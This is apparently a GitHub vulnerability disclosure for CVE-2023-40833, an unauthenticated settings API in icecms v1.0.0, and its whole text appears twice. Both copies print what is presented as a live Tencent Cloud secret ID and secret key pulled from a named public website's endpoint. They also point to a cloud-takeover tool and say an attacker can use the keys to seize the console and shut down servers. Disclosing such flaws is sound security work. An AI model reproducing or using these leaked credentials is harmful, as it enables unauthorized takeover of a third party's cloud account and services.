Sholway/CVE-2023-40833

## CVE-2023-40833
[CVE ID]
CVE-2023-40833
[PRODUCT]
icecms
[VERSION]
v1.0.0
[Vulnerability TYPE]
Insecure Permissions
[Root Cause]
The icecms allows anyone to browser getSetting api,like my local test environment http://localhost:8181/WebSitting/getSetting,
and official website url:https://www.macwk.cc/api/Sitting/getCosSetting.
The official website content is :
      {
        "id": 1,
        "beian": "鲁ICP备19036164号",
        "banquan": "Macwk.com © 2019. All rights reserved.",
        "comment_show": false,
        "sitTitle": "CMS",
        "sitLogo": "",
        "imageFormat": false,
        "cosIntage": "https://icewk-1305088812.cos.ap-nanjing.myqcloud.com",
        "cosBucketName": "icewk-1305088812",
        "cosSecretId": "AKIDjDRQDrRXcA7TfQNk9LO3EJchbFeneY4U",
        "cosSecretKey": "blgxyuiIfnCLaZXH5i6FB4gmDPilY8zb",
        "cosClientConfig": "ap-nanjing",
        "isCos": false
      }

An attacker can obtain the following credentials from the content above:"cosSecretId": "AKIDjDRQDrRXcA7TfQNk9LO3EJchbFeneY4U","cosSecretKey": "blgxyuiIfnCLaZXH5i6FB4gmDPilY8zb",
From the mentioned link (cosIntage) link, we can deduce that the official website is using Elastic Compute Cloud provided by Tencent Cloud platform similar to the AWS cloud platform.
By using the tool provided at https://wiki.teamssix.com/cf/,an attacker can take control of the official user's Tencent cloud platform console and gain access to all cloud services.

[Impact]
An attacker can take control of the official user's Tencent cloud platform console can poweroff the server and gain access to all cloud services.
	[CVE ID]
	CVE-2023-40833
	[PRODUCT]
	icecms
	[VERSION]
	v1.0.0
	[Vulnerability TYPE]
	Insecure Permissions
	[Root Cause]
	The icecms allows anyone to browser getSetting api,like my local test environment http://localhost:8181/WebSitting/getSetting,
	and official website url:https://www.macwk.cc/api/Sitting/getCosSetting.
	The official website content is :
	{
	"id": 1,
	"beian": "鲁ICP备19036164号",
	"banquan": "Macwk.com © 2019. All rights reserved.",
	"comment_show": false,
	"sitTitle": "CMS",
	"sitLogo": "",
	"imageFormat": false,
	"cosIntage": "https://icewk-1305088812.cos.ap-nanjing.myqcloud.com",
	"cosBucketName": "icewk-1305088812",
	"cosSecretId": "AKIDjDRQDrRXcA7TfQNk9LO3EJchbFeneY4U",
	"cosSecretKey": "blgxyuiIfnCLaZXH5i6FB4gmDPilY8zb",
	"cosClientConfig": "ap-nanjing",
	"isCos": false
	}

	An attacker can obtain the following credentials from the content above:"cosSecretId": "AKIDjDRQDrRXcA7TfQNk9LO3EJchbFeneY4U","cosSecretKey": "blgxyuiIfnCLaZXH5i6FB4gmDPilY8zb",
	From the mentioned link (cosIntage) link, we can deduce that the official website is using Elastic Compute Cloud provided by Tencent Cloud platform similar to the AWS cloud platform.
	By using the tool provided at https://wiki.teamssix.com/cf/,an attacker can take control of the official user's Tencent cloud platform console and gain access to all cloud services.

	[Impact]
	An attacker can take control of the official user's Tencent cloud platform console can poweroff the server and gain access to all cloud services.